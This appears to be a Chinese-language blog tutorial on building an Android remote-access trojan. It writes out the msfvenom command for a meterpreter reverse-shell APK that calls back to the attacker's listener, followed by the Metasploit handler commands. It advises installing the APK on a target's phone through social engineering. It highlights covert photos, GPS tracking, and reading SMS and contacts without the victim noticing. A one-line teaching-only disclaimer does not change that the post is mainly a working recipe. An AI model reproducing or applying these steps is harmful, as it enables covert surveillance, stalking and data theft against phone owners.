用于網(wǎng)絡安全教學，切勿用于不當目的！

大多數(shù)情況下，安卓手機在安裝了惡意程序后，或多或少都會被遠控，那么攻擊者在后臺通過指令獲取目標安卓手機的遠程靜默拍照、錄像、錄音、定位、獲取通訊錄和短信真的是不在話下了，下文我們就來探討下這種技術(shù)。

Msfvenom

Kali中的metasploit有一個工具，名為msfvenom，可以生成眾多版本的有效載荷，也就是可執(zhí)行遠控。

比如，我們可以將生成的安卓apk可執(zhí)行程序經(jīng)過社工，安裝在目標手機中，即可完成長期監(jiān)聽或跟蹤。那如何實現(xiàn)呢？這里我們就要用到msfvenom，接下來我們看看使用的方法。

生成安卓遠控

• kali終端下輸入：

msfvenom -h 查看使用幫助

其中我們要關(guān)注的參數(shù)是，-p（指定攻擊有效載荷）-f（指定生成文件的格式）

msfvenom -l payloads
msfvenom -l formats

• 生成遠控的完整命令：

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=8888 R> test.apk

這里沒有使用-f參數(shù)，生成安卓可執(zhí)行程序，可以不用。

• 部署可執(zhí)行程序

將生成的安卓遠控app安裝在目標靶機中，可以通過搭建服務器，讓目標下載安裝apk。

使用metasploit進行監(jiān)聽

啟動msf

Kali終端下輸入：msfconsole

繼續(xù)輸入：

use exploit/multi/handler

本模塊專門用于設置獨立的連接受理程序，這是我們尋找的最后一塊拼圖！在這種使用遠控載荷的情況下，設置multi/handler是必須的，否則無法進程遠程控制。

為該模塊設置參數(shù)：

show options
set LHOST 192.168.31.111
set lport 8888

這里的設置必須和前面用msfvenom的設置保持一致。

run
執(zhí)行偵聽，等待上線

• 得到meterpreter會話

一旦目標安卓手機（靶機）用戶點擊了我們生成的test.apk圖標，我們的kali就會監(jiān)聽到連接信號，得到一個遠程控制目標（靶機）手機的meterpreter會話。

輸入"？"即可顯示所有遠程控制安卓手機的命令，我們這里選擇最精彩的三個：

遠程拍照：目標手機不會有任何察覺，屬于后臺系統(tǒng)拍照；

gps定位：直接顯示經(jīng)緯度地理位置，非常精準；

查看短信與通訊錄；

由于平臺原因，就不明示寫出命令了。如需完整學習安卓嘿客，請進入我頭條主頁，找到相應專欄加入學習吧！

推薦閱讀：黔南都市網(wǎng)